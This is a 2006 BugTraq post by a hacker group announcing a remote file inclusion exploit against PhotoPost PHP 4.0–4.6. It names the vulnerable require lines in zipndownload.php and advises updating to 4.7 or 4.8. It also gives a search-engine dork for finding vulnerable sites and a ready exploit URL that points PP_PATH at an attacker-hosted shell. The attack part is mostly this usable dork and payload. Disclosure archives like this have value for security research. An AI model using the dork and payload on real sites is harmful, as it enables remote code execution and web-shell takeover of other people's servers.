BugTraq
PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit Sep 15 2006 09:24AM
Saudi unix hotmail com
#====================================================================

#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit

#====================================================================

#

#Critical Level : Dangerous

#

#By Saudi Hackrz

#

#http://www.popphoto.com/

#

#=================================================================

#

#Script Name: PhotoPost 4.6 & 4.5 & 4.x.....4.0

#Fix : update To 4.7 or 4.8

#Script :)

#http://www.9q9q.net/up3/index.php?f=UyTfHCHIg

#

#=================================================================

#Bug in : zipndownload.php

# require "$PP_PATH/languages/$pplang/showgallery.php";

# require "$PP_PATH/login-inc.php";

#

#in <<<< zipndownload.php & .... :)

#Dork :in Yahoo ---: "Powered by: PhotoPost PHP 4.6" or "Powered by: PhotoPost PHP 4.5"

#=================================================================

#

#Exploit :

#--------------------------------

#

#http://site.com/[path]/zipndownload.php?PP_PATH=http://SHELLURL.COM?

#

#=================================I LOVE SAUDI

ARABIA=============================================

#Discoverd By : Saudi Hackrz

#

#Conatact : Saudi.unix[at]hotmail.com

#

#GreetZ :Tr_ZiNDaN,BlackWolf,SnIpEr_Sa , King18 , LeCoPrA And All My Frind

==================================I LOVE SAUDI

ARABIA=============================================#

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus